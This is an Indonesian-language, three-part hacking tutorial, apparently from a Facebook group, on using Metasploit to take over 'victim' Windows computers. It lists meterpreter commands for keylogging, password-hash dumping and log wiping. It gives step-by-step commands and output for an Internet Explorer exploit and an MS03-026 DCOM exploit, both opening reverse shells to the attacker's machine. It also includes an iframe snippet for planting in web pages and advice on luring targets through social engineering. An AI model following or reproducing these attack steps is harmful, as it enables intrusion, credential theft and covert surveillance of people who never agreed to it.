[TUTORIAL METASPLOIT Part 1]

Level : Networking (BASIC)

Title : Metasploit
Selamat malam…….

Kali ini saya coba share ulang tentang metasploit, bagi anda member lama group
ini mungkin tidak asing dengan tutor ini.
Anda mungkin mengenal saya (Luciffer) di akun yang lain, bagus eko, wahyu setyanto,
satria baja hitam, dan akun lainnya..dikarenakan saya melanggar TOS dari facebook lewat
tutor saya, alhasil semua akun itu di nonaktifkan oleh pihak facebook, sekarang saya
UNMASK di akun pribadi tapi tetap dengan tutor UNCENSORED cuma sekarang lebih
agak di tahan dikit.. :P

Kali ini kita bahas tentang teknik hacking basic level networking, basic di level networking
karena itu hal awal kita memulai mendalami dunia hacking. kita menggunakan tools Metasploit :D ,
Metasploit ini salah satu yang terbaik untuk hacking jaringan, bisa dikatakan tools sejuta umat.
Salah satu distro yang terbaik untuk hacking adalah Kali Linux. distro ini dilengkapi dengan
metasploit pra-instal, jadi jika Anda ingin menggunakan Kali linux, anda bisa melewatkan beberapa
langkah tutorial ini.

Di sini, saya akan memandu Anda bagaimana cara men-download dan menginstal pada
salah satu distro Linux paling populer yaitu Ubuntu. atau di beberapa distro linux yang Pre-Installer
metasploit. berikut tahapannya :
1. Supaya powerfull menjalankan metasploit ini, kita harus menginstall ruby terlebih
dahulu (update)
Perintahnya :
#sudo apt-get install ruby1.9.1 build-essential

2. kemudian kita install metasploit, sesuaikan dengan system anda apakah 32 atau
64 bit, mendownload metasploit 32 bit dengan wget, perintahnya :
#wget http://downloads.metasploit.com/…/metasploit-latest-linux-x…
dan untuk 64 bit, perintahnya :
#wget http://downloads.metasploit.com/…/metasploit-latest-linux-x…

3. Setelah kita berhasil mendownload metasploit, selanjutnya, kita perlu membuat

executable installer sehingga kita bisa menjalankannya. Di terminal, gunakan
perintah berikut untuk mengubah modus untuk menjalankan (x) untuk Metasploit:
#chmod +x metasploit-latest-linux-x*-installer.run

4. Dan sekarang kita jalankan installer (menggunakan superuser atau root melalui
perintah sudo, Anda akan diminta untuk memasukkan password root Anda untuk
menggunakan perintah ini.):
#sudo ./metasploit-latest-linux-x*-installer.run
Ikuti petunjuk di installer sampai dengan selesai.

5. Setelah Metasploit terinstal, Anda siap untuk menjalankannya! Untuk memulai

metasploit, ketik ini di terminal:
#msfconsole
untuk di kali linux, karena udah pra installer anda langsung saja ketik:
#service metasploit start
disini anda akan melihat banner sebagai hiburan, dan consol msf> itu artinya
metasploit siap menerima perintah

6. Selanjutnya anda membuat workspace untuk area kerja anda, perintahnya :

#msf> workspace
untuk melihat fitur ini, gunakan help/pertolongan dengan parameter -h, perintahnya
:
#msf>workspace -h
untuk create workspace anda , misal 1337cyberindo, perintahnya:
#msf> workspace -a 1337cyberindo

7. untuk selanjutnya adnda bisa setiap waktu mengupdate tools ini supaya up to
date :D perintahnya :
#msfupdate
selanjutnya saya akan terangkan fungsi basic command dari metasploit ini
diantaranya :
#? - help menu
#help - help menu
#background - meletakan sesi saat ini untuk latar belakang
#bgkill - kills background meterpreter script
#bglist - memberikan daftar semua skrip yang berjalan di background
#bgrun - menjalankan script di background thread
#channel - menampilkan channel yang aktiv
#close - menutup channel yang aktiv
#exit - mengakhiri sessi meterpreter
#quit - mengakhiri sessi meterpreter
#interact - berinteraksi dengan channel
#irb - masuk ke Ruby scripting mode
#migrate - memindahkan proses aktif untuk PID yang ditunjuk
#read - membaca data dari channel
#run - mengeksekusi meterpreter script yang sudah di setting
#use - memuat ekstensi meterpreter
#write - menulis data di channel
Perintah File System
#cat - mambaca output dari isi file
#cd - mengganti direktory target
#del - menghapus file di target
#download - download file dari system target ke system si attacker
#edit - edit file
#getlwd - menampilkan local directory
#getwd - menampilkan directory yang bekerja di target
#lcd - mengganti local directory
#lpwd - menampilkan local directory
#ls - list files dalam directory
#mkdir - membuat directory di system korban
#pwd - menampilkan working directory
#rm - menghapus file
#rmdir - menghapus directory di system si korban
#upload - upload file dari si attacker system ke komputer korban
Perintah Networking / jaringan
#ipconfig - menampilkan network interfaces dan informasinya termasuk IP addres
dan lainnya
#portfwd - forwards port dari sistem si korban ke remote service
route
Perintah System
#clearav - membersihkan event logs di komputer korban
#drop_token - mendrop token yang dicuri
#execute - mengeksekusi perintah
#getpid - mengambil process ID (PID)
#getprivs - mengambil hak akses jika itu memungkinkan
#getuid - mengambil userID di server yang sedang dijalankan
#kill - mengakhisi process dari PID
#ps - list proses yang sedang dijalankan
#reboot - merestart komputer korban
#reg - berinteraksi dengan registry di komputer korban
#rev2self - memanggil Revert To Self () di komputer korban
#shell - membuka perintah shell di komputer korban
 #shutdown - shuts down komputer korban
#steal_token - mencoba untuk mencuri tanda spesifik (PID) proses
#sysinfo - mendapat rincian tentang komputer korban seperti OS dan nama
pengguna
Perintah User Interface
#enumdesktops - daftar semua desktop yang dapat diakses
#getdesktop - mendapatkan dekstop saat meterpreter dijalankan
#idletime - untuk mengecek berapa lama sistem korban tidak dijalankan
#keyscan_dump - dumps dari isi keylogger
#keyscan_start - menjalankan keylogger
#keyscan_stop - menghentikan proses keylogging
#screenshot - mengambil gambar dari meterpreter yang dijalankan
#set_desktop - mengganti meterpreter desktop
#uictl - memungkinkan kontrol dari beberapa komponen user interface
Perintah Password Dump
#hashdump - megambil hash password
Catatan : perintah hashdump yang akan sering terdeteksi software Antivirus, tapi
sekarang ada dua script yang lebih tersembunyi, yaitu "run hashdump" dan "run
smart_hashdump".
Perintah lainnya
#timestomp - memanipulasi, memodifikasi, akses, dan membuat atribut dari sebuah
file
Oke, itu beberapa perintah dalam tools metasploit ini, selanjutnya anda harus
mengerti apa saja yang ada di komponen metasploit :
- Proxi pivoting ..??
- Workspace...???
- Scanning...???
- exploit module...???
- Payloads...???
- Auxiliary module...???
- Listener...???
- Shellcode...???
- Exploit...???
Demikian tutorial cara download, instal, dan perintah perintah dalam metasploit.
selanjutnya silahkan diskusikan mengenai arti pemahaman dari komponen metasploit
diatas sebelum kita melangkah ke tutorial eksekusi.

Enjoy (Y)
Luciffer
 [TUTORIAL METASPLOIT Part 2]
Level : Networking (BASIC)
Title : Metasploit
Exploiting IE
Selamat siang….

Kali ini saya akan berikan sedikit tutorial bagian kedua dalam sessi Metasploit
Tapi sebelumnya, pastikan Anda telah membaca tutorial pertama dan memahaminya,
anda bisa baca kembali di link:

https://web.facebook.com/…/1337…/permalink/829253473875957/…

Dalam tutorial ini, kita akan exploitasi komputer korban dengan memanfaatkan
fasilitas browser Microsoft Internet Explorer 6, 7, dan 8, yang berjalan pada Windows XP,
Vista, Windows 7 atau Windows Server 2003 dan 2008.

Mungkin anda bbertanya "kenapa mesti exploitasi internet explorer 8???...

bukankah kebanyakan user pake firefox / chrome??!".

Tapi disini kita pakai logika:

Internet Explorer 8 masih merupakan browser default yang diinstal pada Windows 7, dan
Windows 7 mungkin sistem operasi yang paling banyak digunakan di dunia.
Bukankah ketika anda selesai menginstall windows, anda akan mendapatkan Internet
explorer sebagai default browser dan itu Pra-Installer?
hehe..itu logika sederhana saja, tergantung soceng kita memanfaatkan kelemahan dari
sisi user.
oke..kita jalankan Metasploit (Lihat tutorial pertama link pertama di atas).
root@kali:~# msfconsole
1) Cari Exploit kita akan kita gunakan:
pertama kita cari jenis exploitsi yang kita inginkan dengan perintah "search".
#msf> search type:exploit platform:windows unsafe
anda akan melihat hasil dari pencarian modul,kita akan gunakan:
# exploit/windows/browser/ie_unsafe_scripting

2) Selanjutnya kita memberitahu Metasploit bahwa exploitasi ini yang akan kita
gunakan.
Kita menggunakan parameter "use" untuk memasukan perintahnya:
#msf> use exploit/windows/browser/ie_unsafe_scripting

3) Kemudian pilih payload yang akan digunakan:

Payload adalah sebuah code yang di kirim bersama dengan proses exploitasi, yang
nantinya akan dieksekusi pada pc korban.
Pertama kita harus memuat payload - dalam hal ini kita menggunakan, windows /
meterpreter / reverse_tcp, perintahnya :
#msf> set PAYLOAD windows/meterpreter/reverse_tcp

4) Langkah selanjutnya kita atur pilihan exploitasi

Gunakan perintah "show options" untuk menampilkan pilihan exploiternya:
#msf> show options
nah, payload yang dipilih menuntut kita untuk mengatur LHOST (Local host). Hal ini
mengacu pada komputer Anda (Attacker).
Masukkan alamat IP (misalnya 192.168.56.102) dari komputer lokal:
#msf> set LHOST 192.168.56.101
 Jenis exploitasi ini adalah exploitasi dari sisi client, yang berarti dijalankan pada
komputer korban ketika mereka membuka link yang kita kirim. dan eksploitasi lain
mungkin mengharuskan Anda untuk memasukkan RHOST, yang merupakan
alamat IP target.

5) Jalankan Eksploitasi
Untuk menjalankan mengeksploitasi, cukup ketik:
#msf> exploit (ie_unsafe_scripting) > exploit
kalau session berhasil anda akan mendapatkan result:
#msf>exploit(ie_unsafe_scripting) >
[*] Request received from 192.168.56.102:1080...
[*] Encoding payload into vbs/javascript/html...
[*] Sending exploit html/javascript to 192.168.56.102:1080...
[*] Exe will be uunqgEBHE.exe and must be manually removed from the %TEMP%
directory on the target.
Sending stage (752128 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.101:4444 ->192.168.56.102:1081) at
2016-08-03 14:09:26 +0530
Ini akan menghasilkan link - link berbahaya - yang kita kirim ke komputer target,
dan berharap mereka membukanya dengan sedikit SOCENG.
Ketika target membuka link dalam versi internet explorer, itu akan mengeksploitasi
browser mereka dan kita menguasai komputer mereka.
Berikut adalah cara yang baik untuk mengeksploitasi browser target tanpa mereka
sadari:
Cattan: Dengan sedikit kode HTML sederhana, kita bisa menambahkan link dengan
menanam "iframe" pada source halaman web.
Untuk melakukannya, kita hanya menambahkan kode html ini di mana saja di
dalam <body> halaman Anda:
misal :
<Iframe src = "http://192.168.56.101:8080/2IGIaOJQB"> </ iframe>
Ketika halaman ini buka pada komputer korban, browser mereka akan dieksploitasi,

7) selanjutnya kita buka session yang sedang berjalan tersebut, dengan mengetik
perintah :
# msf> exploit (ie_unsafe_scripting) > sessions

8)Selanjutnya kita buat channel aktiv untuk windows target dengan mengetikan
perintah sessions -i 1:
#msf> exploit (ie_unsafe_scripting) > sessions -i 1
meterpreter > shell
Process 4844 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7264]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:Windowssystem32>

dan itu akan membuka sesi meterpreter aktif yang sedang kita gunakan, kita bisa
mengendalikan komputer mereka.
ini yang saya namakan "kuasai komputer korban dalam jaringan"
Demikian, sedikit tutorial cara exploitasi browser default windows
kita lanjut dengan methode exploitasi lainnya di tutorial selanjutnya

Enjoy (Y)
Luciffer
 [TUTORIAL METASPLOIT Part 3]
Level : Networking (BASIC)
Title : Metasploit

Selamat pagi…..

Kadang banyak PM atau yang posting di group

"Bang ajarin saya jadi hacker??"
" Bang kalau mau jadi hacker, apa saja yang perlu di pelajari??"
" bla..bla..bla...???"
Itu pertanyaan setiap seseorang tertarik dengan dunia hacking.
Hmmm... disini saya bukan seorang hacker/cracker, cuma sedikit memberikan informasi.
semua pertanyaan mendasar diatas kalau anda ingin menjadi seorang hacker TAHAPAN
AWAL nya menurut saya adalah menguasai dulu teknik hacking komputer dalam jaringan.
karena itu hal basic yang perlu diketahui oleh seorang calon hacker.
oke... Tutorial kali ini kita akan bahas teknik hacking komputer jaringan, masih dengan
tools sejuta umat yaitu Metasploit
Tutorial ini kita akan coba mengexploitasi varian windows, misal windows XP,Windows
vista, Server 2003 dan 2008.
Sebelumnya pastikan Anda telah membaca tutorialmetasploit dengan merujuk link ini:
Part 1https://web.facebook.com/groups/1337CyberIndo/permalink/829253473875957/
Part 2https://web.facebook.com/groups/1337CyberIndo/permalink/829581633843141/
Pemahaman
Windows familiar untuk operating system,beberapa varian windows memiliki kerentanan
untuk di exploit yaitu dengan: RPC DCOM. dengan serangan buffer overflow, kita dapat
mengeksekusi kode yang kita inginkan pada komputer korban.

Langkah langkah :
1) Jalankan metasploit, buat workspace.
Untuk memilih exploiter yang kita inginkan, kita akan mencari database metasploit
menggunakan perintah "search" . kita gunakan DCOM untuk exploiter, perintahnya:
#msf> search DCOM

2) Dalam result, Anda akan melihat "exploit/windows/dcerpc/ms03_026_dcom", itu

exploiter yang akan kita gunakan. seperti biasa kita pakai parameter " use " untuk
menggunakan exploit nya,perintahnya ::
#msf > use exploit/windows/dcerpc/ms03_026_dcom

3)Setting exploit
Kita sekarang perlu mensetting sebelum mengeksploitasi,dan melihat apa isi
setingannya kita gunakan parameter "show options", perintahnya :
#msf > show options
Selanjutnya ada 2 pilihan yang perlu di set, yaitu RHOST dan LHOST.
RHOST adalah alamat IP komputer target, misalnya disini192.168.1.10. kita akan
exploit menggunakan port 135 untuk terhubung ke komputer korban.
sedangkan LHOST adalah alamat IP attacker, dalam hal ini 192.168.1.8. kita
gunakan parameter " set ",pengaturannya kira kira seperti ini:
#msf> set RHOST 192.168.1.10
#msf> set LHOST 192.168.1.8

4)Memilih Payload
Payload untuk exploit ini akan dijalankan oleh "buffer overflow".kita cari pilihan nya
dengan parameter "show", perintahnya:
#msf> show payloads
kali ini kita akan gunakan payload untuk membuka reverse shell pada sistem target,
dari daftar payload, kita akan memilih "generic/shell_reverse_tcp", dengan
menggunakan perintah "set":
#msf > set PAYLOAD generic/shell_reverse_tcp
 6) Exploit
sekarang kita jalankan exploit,dengan perintah:
#msf> exploit

7) Menunggu...hmmm..Kopi hideung heula meh lincah !!!

Sekarang kita tinggal menunggu proses dan membuka shell pada komputer
target.Ketik perintah berikut untuk membuka perintah shell pada sistem windows
yang kita exploit tadi, perintahnya:
#sessions –i 1
================= 8)))))))))))D******=====================
"Sekarang anda sudah menguasai komputer target dalam jaringan ", Selanjutnya anda
tinggal eksekusi apa yang diinginkan, misal download file, upload file dll. Parameter
perintahnya ada di Tutorial Metasploit part 1 dengan link diatas.
Oke..terima kasih sudah menyimak, silahkan praktekan di jaringan komputer anda dengan
windows sebagai server/target nya.
jika ingin copas sertakan sumber ini...respect (Y)

Regard's
Luciffer